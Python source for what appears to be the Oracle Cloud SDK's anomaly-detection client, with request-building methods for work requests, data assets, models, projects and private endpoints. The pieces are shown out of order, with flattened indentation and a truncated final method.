path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestLogEntryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestLogEntryCollection")
def list_work_requests(self, compartment_id, **kwargs):
"""
Lists the work requests in a compartment.
:param str compartment_id: (required)
The ID of the compartment in which to list resources.
:param str work_request_id: (optional)
The ID of the asynchronous work request.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str page: (optional)
The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call.
:param int limit: (optional)
The maximum number of items to return.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.WorkRequestSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/list_work_requests.py.html>`__ to see an example of how to use list_work_requests API.
"""
resource_path = "/workRequests"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"work_request_id",
"opc_request_id",
"page",
"limit"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_requests got unknown kwargs: {!r}".format(extra_kwargs))
query_params = {
"compartmentId": compartment_id,
"workRequestId": kwargs.get("work_request_id", missing),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestSummaryCollection")
def update_ai_private_endpoint(self, ai_private_endpoint_id, update_ai_private_endpoint_details, **kwargs):
"""
Updates the private reverse connection endpoint.
:param str ai_private_endpoint_id: (required)
Unique private reverse connection identifier.
:param oci.ai_anomaly_detection.models.UpdateAiPrivateEndpointDetails update_ai_private_endpoint_details: (required)
The information to be updated in private reverse connection
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/update_ai_private_endpoint.py.html>`__ to see an example of how to use update_ai_private_endpoint API.
"""
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_ai_private_endpoint_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_ai_private_endpoint_details)
def update_data_asset(self, data_asset_id, update_data_asset_details, **kwargs):
"""
Updates the DataAsset
:param str data_asset_id: (required)
The OCID of the Data Asset.
:param oci.ai_anomaly_detection.models.UpdateDataAssetDetails update_data_asset_details: (required)
The information to be updated.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/update_data_asset.py.html>`__ to see an example of how to use update_data_asset API.
"""
resource_path = "/dataAssets/{dataAssetId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_asset_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_asset_details,
response_type="DataAsset")
def update_model(self, model_id, update_model_details, **kwargs):
"""
Updates the Model
:param str model_id: (required)
The OCID of the Model.
:param oci.ai_anomaly_detection.models.UpdateModelDetails update_model_details: (required)
The information to be updated.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/update_model.py.html>`__ to see an example of how to use update_model API.
"""
resource_path = "/models/{modelId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_model got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_model_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_model_details)
def update_project(self, project_id, update_project_details, **kwargs):
"""
Updates the Project
:param str project_id: (required)
The OCID of the Project.
:param oci.ai_anomaly_detection.models.UpdateProjectDetails update_project_details: (required)
The information to be updated.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.Project`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/update_project.py.html>`__ to see an example of how to use update_project API.
"""
resource_path = "/projects/{projectId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_project_details,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_project_details,
response_type="Project")
# (non-code dataset residue, preserved as a comment) | 48.434457 | 261 | 0.647801 |
from __future__ import absolute_import
# Vendored third-party dependencies bundled with the SDK.
from oci._vendor import requests  # noqa: F401 -- kept for side effects / vendoring parity
from oci._vendor import six
# First-party OCI SDK plumbing: retry policies, circuit breaker, HTTP client,
# config validation, and request signing.
from oci import retry, circuit_breaker
from oci.base_client import BaseClient
from oci.config import get_config_value_or_default, validate_config
from oci.signer import Signer
from oci.util import Sentinel, get_signer_from_authentication_type, AUTHENTICATION_TYPE_FIELD_NAME
# Maps wire-level type names to model classes for response deserialization.
from .models import ai_anomaly_detection_type_mapping
# Sentinel distinguishing "argument not supplied" from an explicit None.
missing = Sentinel("Missing")
class AnomalyDetectionClient(object):
def __init__(self, config, **kwargs):
validate_config(config, signer=kwargs.get('signer'))
if 'signer' in kwargs:
signer = kwargs['signer']
elif AUTHENTICATION_TYPE_FIELD_NAME in config:
signer = get_signer_from_authentication_type(config)
else:
signer = Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
base_client_init_kwargs = {
'regional_client': True,
'service_endpoint': kwargs.get('service_endpoint'),
'base_path': '/20210101',
'service_endpoint_template': 'https://anomalydetection.aiservice.{region}.oci.{secondLevelDomain}',
'skip_deserialization': kwargs.get('skip_deserialization', False),
'circuit_breaker_strategy': kwargs.get('circuit_breaker_strategy', circuit_breaker.GLOBAL_CIRCUIT_BREAKER_STRATEGY)
}
if 'timeout' in kwargs:
base_client_init_kwargs['timeout'] = kwargs.get('timeout')
self.base_client = BaseClient("anomaly_detection", config, signer, ai_anomaly_detection_type_mapping, **base_client_init_kwargs)
self.retry_strategy = kwargs.get('retry_strategy')
self.circuit_breaker_callback = kwargs.get('circuit_breaker_callback')
def cancel_work_request(self, work_request_id, **kwargs):
resource_path = "/workRequests/{workRequestId}"
method = "DELETE"
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"cancel_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def change_ai_private_endpoint_compartment(self, ai_private_endpoint_id, change_ai_private_endpoint_compartment_details, **kwargs):
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_ai_private_endpoint_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_ai_private_endpoint_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_ai_private_endpoint_compartment_details)
def change_data_asset_compartment(self, data_asset_id, change_data_asset_compartment_details, **kwargs):
resource_path = "/dataAssets/{dataAssetId}/actions/changeCompartment"
method = "POST"
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_data_asset_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_data_asset_compartment_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_data_asset_compartment_details,
response_type="DataAsset")
def change_model_compartment(self, model_id, change_model_compartment_details, **kwargs):
resource_path = "/models/{modelId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_model_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_model_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_model_compartment_details)
def change_project_compartment(self, project_id, change_project_compartment_details, **kwargs):
resource_path = "/projects/{projectId}/actions/changeCompartment"
method = "POST"
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_project_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_project_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_project_compartment_details)
def create_ai_private_endpoint(self, create_ai_private_endpoint_details, **kwargs):
    """Create a new AI private endpoint (POST /aiPrivateEndpoints).

    :param create_ai_private_endpoint_details: request body describing the endpoint.
    :param kwargs: optional ``retry_strategy``, ``opc_request_id``, ``opc_retry_token``.
    :raises ValueError: for unrecognized kwargs.
    """
    resource_path = "/aiPrivateEndpoints"
    method = "POST"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "create_ai_private_endpoint got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=create_ai_private_endpoint_details)

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def create_data_asset(self, create_data_asset_details, **kwargs):
    """Create a new DataAsset (POST /dataAssets).

    :param create_data_asset_details: request body describing the data asset.
    :param kwargs: optional ``retry_strategy``, ``opc_retry_token``, ``opc_request_id``.
    :return: response whose data is deserialized as ``DataAsset``.
    :raises ValueError: for unrecognized kwargs.
    """
    resource_path = "/dataAssets"
    method = "POST"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "opc_retry_token",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "create_data_asset got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=create_data_asset_details,
        response_type="DataAsset")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def create_model(self, create_model_details, **kwargs):
    """Create a new Model (POST /models).

    :param create_model_details: request body describing the model.
    :param kwargs: optional ``retry_strategy``, ``opc_retry_token``, ``opc_request_id``.
    :return: response whose data is deserialized as ``Model``.
    :raises ValueError: for unrecognized kwargs.
    """
    resource_path = "/models"
    method = "POST"

    # Fail fast on any keyword argument this operation does not recognize.
    allowed_kwargs = [
        "retry_strategy",
        "opc_retry_token",
        "opc_request_id"
    ]
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "create_model got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and the plain invocation paths.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=create_model_details,
        response_type="Model")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
